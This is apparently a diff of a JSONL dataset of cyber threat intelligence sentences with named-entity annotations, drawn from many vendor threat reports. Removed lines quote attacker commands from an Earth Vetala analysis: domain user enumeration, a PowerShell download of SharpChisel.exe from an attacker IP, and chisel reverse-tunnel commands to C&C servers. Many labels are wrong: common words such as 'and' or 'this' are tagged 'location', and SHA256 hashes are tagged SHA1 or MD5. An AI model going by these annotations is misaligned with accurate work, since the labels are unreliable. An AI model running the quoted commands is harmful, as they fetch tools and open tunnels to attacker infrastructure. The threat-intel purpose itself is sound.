Seedworm).","entities":[{"id":19994,"label":"location","start_offset":26,"end_offset":36},{"id":19995,"label":"threat-actor","start_offset":90,"end_offset":100},{"id":19996,"label":"threat-actor","start_offset":116,"end_offset":127},{"id":19997,"label":"threat-actor","start_offset":129,"end_offset":142},{"id":19998,"label":"threat-actor","start_offset":144,"end_offset":152}],"relations":[],"Comments":[]} -{"id":6426,"text":"This campaign uses the following legitimate remote admin tools such as: ScreenConnect RemoteUtilities We have named this intrusion set Earth Vetala.","entities":[{"id":20002,"label":"location","start_offset":5,"end_offset":13},{"id":20003,"label":"location","start_offset":44,"end_offset":50},{"id":20004,"label":"malware","start_offset":73,"end_offset":86},{"id":20005,"label":"malware","start_offset":87,"end_offset":102}],"relations":[],"Comments":[]} -{"id":6427,"text":"Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package.","entities":[],"relations":[],"Comments":[]} -{"id":6431,"text":"The threat actors would then initiate communications with additional command-and-control (C&C) infrastructure to execute obfuscated PowerShell scripts.","entities":[{"id":20012,"label":"location","start_offset":77,"end_offset":80},{"id":20013,"label":"attack-pattern","start_offset":132,"end_offset":142}],"relations":[],"Comments":[]} -{"id":6433,"text":"Earth Vetala historically targets countries in the Middle East.","entities":[],"relations":[],"Comments":[]} -{"id":6435,"text":"The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool.","entities":[{"id":20029,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":20030,"label":"location","start_offset":20,"end_offset":23},{"id":20031,"label":"location","start_offset":24,"end_offset":28},{"id":20033,"label":"location","start_offset":158,"end_offset":164},{"id":20034,"label":"location","start_offset":179,"end_offset":183}],"relations":[],"Comments":[]} -{"id":6439,"text":"During this campaign, threat actors used post-exploitation tools to dump passwords, tunnel their C&C communication using open-source tools, and use additional C&C infrastructure to establish a persistent presence within targeted hosts and environments.","entities":[{"id":20043,"label":"location","start_offset":12,"end_offset":20},{"id":20044,"label":"location","start_offset":41,"end_offset":45},{"id":20045,"label":"location","start_offset":84,"end_offset":90},{"id":20046,"label":"attack-pattern","start_offset":126,"end_offset":132},{"id":20047,"label":"location","start_offset":140,"end_offset":143},{"id":20048,"label":"location","start_offset":235,"end_offset":238}],"relations":[],"Comments":[]} -{"id":6440,"text":"Technical Analysis","entities":[],"relations":[],"Comments":[]} -{"id":6442,"text":" Figure 1. Phishing Email with the embedded URL The email attempts to convince recipients to click the URL and download a malicious file.","entities":[{"id":20051,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20052,"label":"location","start_offset":116,"end_offset":119}],"relations":[],"Comments":[]} -{"id":6446,"text":"The use of this tool differentiates this particular campaign from earlier research, as in previous attacks ScreenConnect was used.","entities":[{"id":20073,"label":"location","start_offset":16,"end_offset":20},{"id":20074,"label":"location","start_offset":52,"end_offset":60},{"id":20075,"label":"malware","start_offset":107,"end_offset":120}],"relations":[],"Comments":[]} -{"id":6447,"text":"Otherwise, the TTPs in use remain broadly similar.","entities":[],"relations":[],"Comments":[]} -{"id":6448,"text":"RemoteUtilities Analysis","entities":[{"id":20076,"label":"tools","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":6449,"text":"When the RemoteUtilities software is executed, its process launches msiexec.exe with the following command:","entities":[],"relations":[],"Comments":[]} -{"id":6450,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":6451,"text":"RemoteUtilities Installation The MSI installer installs a service on the victim machine called Remote Utilities – Host: Figure 5.","entities":[{"id":20079,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":6452,"text":"Remote Utilities Service The service then communicates with the domain id.remoteutilities.com, which belongs to RemoteUtilities.","entities":[{"id":20082,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} +{"id":9781,"text":"The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents.","entities":[{"id":29793,"label":"location","start_offset":33,"end_offset":37},{"id":29794,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} +{"id":14148,"text":"Cybercriminals and malicious hackers have been shifting their tactics, techniques, and procedures (TTPs) to improve their ability to infiltrate an organization and stay under the radar of security professionals and solutions.","entities":[],"relations":[],"Comments":[]} +{"id":1225,"text":"One piece is embedded into Android apps or games for developers as a part of the source code.","entities":[{"id":46608,"label":"SOFTWARE","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} +{"id":10098,"text":"This was done as part of the build process; the source code repository was not affected.","entities":[{"id":30792,"label":"attack-pattern","start_offset":48,"end_offset":54}],"relations":[],"Comments":[]} +{"id":275,"text":" We have released public reports on the WhisperGate attacks and the infrastructure and tactics used by the Gamaredon group.","entities":[{"id":45965,"label":"malware","start_offset":40,"end_offset":51},{"id":45966,"label":"threat-actor","start_offset":107,"end_offset":122}],"relations":[],"Comments":[]} +{"id":379,"text":"Conclusion Indicators of Compromise ","entities":[],"relations":[],"Comments":[]} +{"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} +{"id":1658,"text":" NetWire uses a custom, TCP-based protocol.","entities":[{"id":4926,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":5904,"text":"Jon:","entities":[],"relations":[],"Comments":[]} +{"id":5675,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":17489,"label":"location","start_offset":36,"end_offset":39},{"id":17493,"label":"malware","start_offset":179,"end_offset":187},{"id":17494,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} +{"id":909,"text":"The RC4 key is generated by concatenating the SHA256 value previously generated with the path to the file being encrypted.","entities":[],"relations":[],"Comments":[]} +{"id":1269,"text":" Figure 3. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":44959,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} +{"id":5431,"text":"Access to these services should be limited, which can be achieved by configuring a virtual private network (VPN) that can access those services remotely.","entities":[],"relations":[],"Comments":[]} +{"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} +{"id":12989,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} +{"id":2702,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":8673,"text":"The exploit targeted iOS versions 12.4 through 13.7.","entities":[],"relations":[],"Comments":[]} +{"id":2668,"text":" When looking at leak site data across all ransomware families, we\u2019ve observed LockBit 2.0 targeting the highest number of organizations in the following regions: JAPAC, EMEA, and LATAM.","entities":[{"id":47862,"label":"location","start_offset":163,"end_offset":168},{"id":47863,"label":"location","start_offset":170,"end_offset":174},{"id":47864,"label":"location","start_offset":180,"end_offset":185},{"id":47861,"label":"threat-actor","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} +{"id":955,"text":"We have captured around 63,000 Android apps in WildFire that include the Taomike library but only around 18,000 include the SMS theft functionality.","entities":[{"id":2996,"label":"SOFTWARE","start_offset":47,"end_offset":55},{"id":46463,"label":"identity","start_offset":73,"end_offset":80},{"id":46464,"label":"attack-pattern","start_offset":124,"end_offset":133}],"relations":[],"Comments":[]} +{"id":2,"text":"The attack vector is very basic and repeats itself: It begins with a spear phishing email sent with SCR attachments (double zipped).","entities":[{"id":48941,"label":"attack-pattern","start_offset":69,"end_offset":115}],"relations":[],"Comments":[]} +{"id":10013,"text":"Indicators of Compromise (IoCs): Related hashes (SHA-256): 0703a917aaa0630ae1860fb5fb1f64f3cfb4ea8c57eac71c2b0a407b738c4e19 (ShiftDoor) \u2014 detected by Trend Micro as BKDR_SETHC.D c14ea9b81f782ba36ae3ea450c2850642983814a0f4dc0ea4888038466839c1e (aio.exe)","entities":[{"id":30587,"label":"SHA2","start_offset":60,"end_offset":124},{"id":30589,"label":"MD5","start_offset":179,"end_offset":243}],"relations":[],"Comments":[]} +{"id":7300,"text":" Figure 10. Encrypted strings Figures 11-12.","entities":[],"relations":[],"Comments":[]} +{"id":5131,"text":"East\/west is within the network itself.","entities":[],"relations":[],"Comments":[]} +{"id":11842,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":36511,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} +{"id":13853,"text":"This article has been updated to add references to the DarkSide victim data.","entities":[],"relations":[],"Comments":[]} +{"id":1837,"text":"We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.","entities":[],"relations":[],"Comments":[]} +{"id":14061,"text":"Both use JPG as a delivering extension.","entities":[],"relations":[],"Comments":[]} +{"id":7705,"text":" Figure 7. XOR Encrypted C&C communication","entities":[],"relations":[],"Comments":[]} +{"id":11269,"text":"Restore endpoint connection Restores the network connectivity on an endpoint after investigation and\/or remediation has occurred","entities":[],"relations":[],"Comments":[]} +{"id":148,"text":"The way the attackers get the ransomware on the system varies: it can be through unpatched vulnerabilities, social engineering or both.","entities":[],"relations":[],"Comments":[]} +{"id":11185,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":34241,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":34242,"label":"location","start_offset":57,"end_offset":61},{"id":34246,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} +{"id":11312,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":34575,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":34576,"label":"location","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} +{"id":12084,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[],"relations":[],"Comments":[]} +{"id":8561,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":26452,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":26454,"label":"location","start_offset":64,"end_offset":74},{"id":26455,"label":"location","start_offset":78,"end_offset":82},{"id":26456,"label":"attack-pattern","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} +{"id":9610,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} +{"id":4969,"text":"Consistent with findings from CitizenLab, we assess likely government-backed actors purchasing these exploits are operating (at least) in Egypt, Armenia, Greece, Madagascar, C\u00f4te d\u2019Ivoire, Serbia, Spain and Indonesia.","entities":[{"id":51025,"label":"location","start_offset":162,"end_offset":173},{"id":51026,"label":"location","start_offset":174,"end_offset":187},{"id":51027,"label":"location","start_offset":189,"end_offset":195},{"id":51029,"label":"location","start_offset":207,"end_offset":216},{"id":51021,"label":"identity","start_offset":30,"end_offset":40},{"id":51023,"label":"location","start_offset":145,"end_offset":152},{"id":51028,"label":"location","start_offset":197,"end_offset":202},{"id":51024,"label":"location","start_offset":154,"end_offset":160},{"id":51022,"label":"location","start_offset":138,"end_offset":143}],"relations":[],"Comments":[]} +{"id":5776,"text":"Jon Clay, VP of Threat Intelligence: [00:00:00","entities":[],"relations":[],"Comments":[]} +{"id":7445,"text":"Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered.","entities":[{"id":23149,"label":"identity","start_offset":36,"end_offset":42},{"id":23150,"label":"location","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} +{"id":5154,"text":"Once they've driven to the store.","entities":[],"relations":[],"Comments":[]} +{"id":1763,"text":"Further details were discussed in depth last month on Rapid7\u2019s blog.","entities":[{"id":46913,"label":"identity","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} +{"id":5313,"text":"The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":3270,"text":"After the malware joins the C&C server, the server will assign a victim ID with \u201cset key\u201d event and send multiple \u201caccept task\u201d events with the commands \u201cScreenShot\u201d, \u201cSnsInfo\u201d, \u201cPackingTelegram\u201d, \u201cGetBrowsersCookies\u201d, \u201cGetBrowsersLogins\u201d, \u201cGetBrowsersHistories\u201d, and \u201cGetBrowsersBookmarks\u201d to instruct the malware to collect private data from the victim.","entities":[],"relations":[],"Comments":[]} +{"id":1105,"text":"Simply put: malware writers leverage malware specific libraries and groups of like actors will reuse these core libraries when able. The needle in a haystack problem forever plagues malware research: it\u2019s extremely difficult to find reliable information with malware writers constantly working to undermine or eliminate that information.","entities":[],"relations":[],"Comments":[]} +{"id":13643,"text":"The phishing emails redirect users to fake Office 365 login pages.","entities":[{"id":42476,"label":"attack-pattern","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} +{"id":1015,"text":"He claimed that once the account was sold, only the one buyer and the legitimate user would have access.","entities":[],"relations":[],"Comments":[]} +{"id":10402,"text":"Send the volume serial number of the C drive, which allows the attacker to identify the victim.","entities":[],"relations":[],"Comments":[]} +{"id":11364,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} +{"id":612,"text":" Figure 3: Hancitor distribution servers globally thus far in 2017 Table 1 \u2013 Number of Distribution Servers by Country ","entities":[{"id":44799,"label":"malware","start_offset":11,"end_offset":19},{"id":44800,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} +{"id":3725,"text":"ATT&CK\u00ae tactics and techniques for Linux were also shared by MITRE.","entities":[{"id":49525,"label":"identity","start_offset":61,"end_offset":66},{"id":49526,"label":"SOFTWARE","start_offset":35,"end_offset":40}],"relations":[],"Comments":[]} +{"id":433,"text":" Where this becomes a problem is when coin mining is done without the user\u2019s knowledge and consent.","entities":[],"relations":[],"Comments":[]} +{"id":5819,"text":"Jon:","entities":[],"relations":[],"Comments":[]} +{"id":751,"text":"The heap block will not be occupied by user-controlled data after the critical objects are freed.","entities":[],"relations":[],"Comments":[]} +{"id":7435,"text":" Figure 2. A phony email from Pawn Storm","entities":[{"id":23121,"label":"threat-actor","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} +{"id":278,"text":" There is no single action you can take to protect your organization against this threat.","entities":[],"relations":[],"Comments":[]} +{"id":3871,"text":"Given how cybercriminal tools, tactics and procedures are evolving, organizations will have to go beyond their typical day-to-day security requirements and find a way to preempt attacks.","entities":[],"relations":[],"Comments":[]} +{"id":3560,"text":"The infection chain for Capesand that also shows the obfuscation mechanisms For this particular sample, CyaX_Sharp is obfuscated with a customized version of ConfuserEx.","entities":[{"id":49348,"label":"tools","start_offset":104,"end_offset":114},{"id":49349,"label":"tools","start_offset":158,"end_offset":168},{"id":49347,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} +{"id":7143,"text":"Weaponized documents exploiting the Dynamic Data Exchange (DDE) method Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor Exploitation of the CVE-2019-0604 vulnerability in Sharepoint Supply chain attack that compromises a chat software installer, Able Desktop Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server","entities":[{"id":22321,"label":"attack-pattern","start_offset":36,"end_offset":57},{"id":22322,"label":"threat-actor","start_offset":138,"end_offset":146},{"id":22323,"label":"location","start_offset":216,"end_offset":222},{"id":22324,"label":"location","start_offset":255,"end_offset":259},{"id":22325,"label":"location","start_offset":342,"end_offset":347},{"id":22326,"label":"location","start_offset":381,"end_offset":384},{"id":22327,"label":"identity","start_offset":404,"end_offset":413},{"id":22328,"label":"location","start_offset":414,"end_offset":422}],"relations":[],"Comments":[]} +{"id":4767,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50672,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":4784,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} +{"id":1732,"text":"They can also steal your computer\u2019s processing power to mine for cryptocurrencies, which slows down your system.","entities":[],"relations":[],"Comments":[]} +{"id":9313,"text":"Impersonating the Google Analytics service is a known tactic also used by Magecart Group 11, the group behind the Vision Direct breach.","entities":[],"relations":[],"Comments":[]} +{"id":4045,"text":"Based on our current cases, the decrypted payload is Quasar RAT.","entities":[{"id":12265,"label":"malware","start_offset":53,"end_offset":63}],"relations":[],"Comments":[]} +{"id":9621,"text":"We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. APT 32, APT-C-00, SeaLotus, and Cobalt Kitty).","entities":[{"id":29476,"label":"malware","start_offset":60,"end_offset":76},{"id":29478,"label":"threat-actor","start_offset":155,"end_offset":161},{"id":29481,"label":"location","start_offset":183,"end_offset":186}],"relations":[],"Comments":[]} +{"id":14027,"text":"Some Freenki samples had leaked the OS language ID through this same mechanism.","entities":[{"id":47193,"label":"malware","start_offset":5,"end_offset":13}],"relations":[],"Comments":[]} +{"id":1423,"text":"Following a recent study of apps in the Google Play Store, let\u2019s discuss several security risks caused by the bad certificate management practiced in many Android apps, from social to mobile banking.","entities":[{"id":46760,"label":"SOFTWARE","start_offset":40,"end_offset":57},{"id":46761,"label":"SOFTWARE","start_offset":155,"end_offset":162}],"relations":[],"Comments":[]} +{"id":5779,"text":"Joining me again is my cohort in crime.","entities":[],"relations":[],"Comments":[]} +{"id":3589,"text":"The leaked debug symbols paths","entities":[],"relations":[],"Comments":[]} +{"id":10858,"text":"phkyxc: A component used as WifiWakeLock.","entities":[],"relations":[],"Comments":[]} +{"id":13846,"text":"T1129 Dynamically loads the DLLs through the shellcode Execution through API T1106","entities":[{"id":42922,"label":"attack-pattern","start_offset":57,"end_offset":78}],"relations":[],"Comments":[]} +{"id":4563,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50382,"label":"vulnerability","start_offset":16,"end_offset":54},{"id":50383,"label":"TIME","start_offset":75,"end_offset":83},{"id":50384,"label":"TIME","start_offset":159,"end_offset":163},{"id":50385,"label":"identity","start_offset":188,"end_offset":197}],"relations":[],"Comments":[]} +{"id":5087,"text":"This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.","entities":[],"relations":[],"Comments":[]} +{"id":6720,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":534,"text":"For example, GandCrab uses JScript as a downloader, leveraging Windows Background Intelligent Transfer Service (BITS) to download the payload in the background (Figure 5).","entities":[{"id":44765,"label":"malware","start_offset":13,"end_offset":21},{"id":44766,"label":"tools","start_offset":63,"end_offset":117}],"relations":[{"id":20,"from_id":44765,"to_id":44766,"type":"uses"}],"Comments":[]} +{"id":7589,"text":"In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function.","entities":[{"id":23652,"label":"location","start_offset":8,"end_offset":12},{"id":23653,"label":"malware","start_offset":36,"end_offset":46},{"id":23654,"label":"location","start_offset":48,"end_offset":52},{"id":23655,"label":"location","start_offset":76,"end_offset":79},{"id":23656,"label":"location","start_offset":122,"end_offset":128}],"relations":[],"Comments":[]} +{"id":4479,"text":"TAG also recently released information on a segment of attackers we call \u201chack-for-hire\u201d that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50279,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50278,"label":"identity","start_offset":0,"end_offset":3},{"id":50280,"label":"attack-pattern","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} +{"id":10185,"text":"Cookie Theft, also known as \u201cpass-the-cookie attack,\u201d is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":31104,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} +{"id":9322,"text":"ReactGet Group injection pattern Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} +{"id":14382,"text":"EDR is great for endpoints they are on.","entities":[],"relations":[],"Comments":[]} +{"id":2970,"text":"PCs and Macs as well as smartphones and tablets increasingly support the use of password managers directly.","entities":[],"relations":[],"Comments":[]} +{"id":1635,"text":"One account using the name \u201cOscar Sanchez\u201d gave high ratings and positive comments to many of the \u201cfun app\u201d applications.","entities":[{"id":45081,"label":"identity","start_offset":28,"end_offset":41},{"id":46858,"label":"identity","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} +{"id":3504,"text":"Marade acts as the first stage of attack, sending the compromised system\u2019s information to the C&C server and then awaiting commands from the controller.","entities":[{"id":49299,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":416,"text":" What Is Unauthorized Coin Mining?","entities":[{"id":46114,"label":"attack-pattern","start_offset":9,"end_offset":33}],"relations":[],"Comments":[]} +{"id":3991,"text":" While the guideline gives thorough recommendations on preventing supply chain attacks, it is still vital for organizations to take extra measures to mitigate vulnerable software components.","entities":[],"relations":[],"Comments":[]} +{"id":5699,"text":"Our telemetry data shows Earth Lusca sending spear phishing emails containing malicious links to one of their targets \u2014 a media company.","entities":[{"id":17581,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":17583,"label":"location","start_offset":122,"end_offset":127}],"relations":[],"Comments":[]} {"id":6454,"text":"This feature allows an intermediary Internet server to broker the connection, similar to a proxy server.","entities":[],"relations":[],"Comments":[]} -{"id":6456,"text":" Figure 6. id-server connection ","entities":[],"relations":[],"Comments":[]} -{"id":6459,"text":"They were targeted via a malicious .ZIP file (SHA256 hash: b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) that contained a ScreenConnect executable (SHA256 hash: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf)","entities":[{"id":20094,"label":"SHA1","start_offset":59,"end_offset":123},{"id":20096,"label":"SHA1","start_offset":181,"end_offset":244}],"relations":[],"Comments":[]} -{"id":6460,"text":"As noted above, the ScreenConnect executable connects to the Internet-ID server, which is located at instance-sy9at2-relay.screenconnect.com and resolves to 51.68.244.39.","entities":[{"id":20099,"label":"location","start_offset":141,"end_offset":144},{"id":20100,"label":"IPV4","start_offset":157,"end_offset":169}],"relations":[],"Comments":[]} -{"id":6463,"text":"cmd.exe net user \/domain","entities":[{"id":20104,"label":"malware","start_offset":0,"end_offset":7},{"id":20105,"label":"malware","start_offset":8,"end_offset":11}],"relations":[],"Comments":[]} -{"id":6464,"text":"The command above allows the attacker to get all the users from the domain controller.","entities":[],"relations":[],"Comments":[]} -{"id":6465,"text":"The next command executed is the following: powershell.exe -exec bypass -w 1 -file a.ps1","entities":[],"relations":[],"Comments":[]} -{"id":6466,"text":"This is a command to execute a PowerShell script of some kind.","entities":[{"id":20106,"label":"attack-pattern","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} -{"id":6467,"text":"However, we did not have access to the a.ps1 file.","entities":[],"relations":[],"Comments":[]} -{"id":6469,"text":"The next command issued is the following: powershell.exe iwr -uri http:\/\/87.236.212[.]184\/SharpChisel.exe -outfile c:\\programdata\\SharpChisel.exe -usebasicparsing","entities":[{"id":20108,"label":"URL","start_offset":66,"end_offset":89}],"relations":[],"Comments":[]} -{"id":6470,"text":"The command is connected to 187.236.212[.]184 and downloads a file called SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\\programdata directory.","entities":[{"id":20109,"label":"IPV4","start_offset":28,"end_offset":45},{"id":20110,"label":"location","start_offset":46,"end_offset":49},{"id":20111,"label":"SHA1","start_offset":99,"end_offset":163},{"id":20112,"label":"location","start_offset":165,"end_offset":168}],"relations":[],"Comments":[]} -{"id":6471,"text":"The name SharpChisel may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called chisel.","entities":[{"id":20113,"label":"location","start_offset":21,"end_offset":24},{"id":20114,"label":"location","start_offset":103,"end_offset":107},{"id":20115,"label":"malware","start_offset":115,"end_offset":121}],"relations":[],"Comments":[]} -{"id":6472,"text":"The above IP address is geolocated to a server in Iran.","entities":[],"relations":[],"Comments":[]} -{"id":6473,"text":"The following command then configures SharpChisel: C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999","entities":[],"relations":[],"Comments":[]} -{"id":6475,"text":"Another instance of SharpChisel with different settings is executed, this time using PowerShell using the following command line: powershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999","entities":[{"id":20121,"label":"location","start_offset":74,"end_offset":78},{"id":20122,"label":"attack-pattern","start_offset":85,"end_offset":95}],"relations":[],"Comments":[]} -{"id":6477,"text":"A third SharpChisel instance that connects to a different C&C server at 23.95.215.100:8080 is started via the following command: C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999 It is then configured with the following command line PowerShell command: powershell.exe C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999","entities":[{"id":20125,"label":"attack-pattern","start_offset":264,"end_offset":274}],"relations":[],"Comments":[]} -{"id":6478,"text":"We believe that the threat actor was unable to configure SharpChisel to work correctly.","entities":[],"relations":[],"Comments":[]} -{"id":6481,"text":"That supports our assumption that SharpChisel could not be configured correctly, and the attacker instead used PowerShell to download and run the legitimate procdump64.exe utility.","entities":[{"id":20128,"label":"location","start_offset":18,"end_offset":28},{"id":20129,"label":"location","start_offset":81,"end_offset":84},{"id":20130,"label":"attack-pattern","start_offset":111,"end_offset":121},{"id":20131,"label":"location","start_offset":134,"end_offset":137},{"id":20132,"label":"location","start_offset":172,"end_offset":179}],"relations":[],"Comments":[]} -{"id":6482,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":3535,"text":"And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.","entities":[],"relations":[],"Comments":[]} +{"id":3605,"text":"Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident.","entities":[{"id":49385,"label":"identity","start_offset":61,"end_offset":138}],"relations":[],"Comments":[]} +{"id":603,"text":"When they would do this, the Hancitor attachment would download and install the final malware from a malicious or compromised site.","entities":[{"id":44793,"label":"malware","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} +{"id":2655,"text":"The operators work with initial access brokers to save time and allow for a larger profit potential.","entities":[],"relations":[],"Comments":[]} +{"id":10615,"text":"We encourage high-risk users\u2014like journalists, human rights activists, and political campaigns\u2014to enroll in our Advanced Protection Program (APP), which utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":32379,"label":"location","start_offset":71,"end_offset":74},{"id":32380,"label":"location","start_offset":121,"end_offset":131},{"id":32381,"label":"location","start_offset":171,"end_offset":179},{"id":32382,"label":"location","start_offset":185,"end_offset":188},{"id":32383,"label":"attack-pattern","start_offset":242,"end_offset":250},{"id":32384,"label":"location","start_offset":251,"end_offset":254}],"relations":[],"Comments":[]} +{"id":13399,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":41708,"label":"malware","start_offset":0,"end_offset":5},{"id":41709,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} +{"id":8117,"text":"MediaTek-SU exploit","entities":[],"relations":[],"Comments":[]} +{"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim\u2019s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} +{"id":3860,"text":"Short-term mitigation","entities":[],"relations":[],"Comments":[]} +{"id":7249,"text":"In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors\u2019 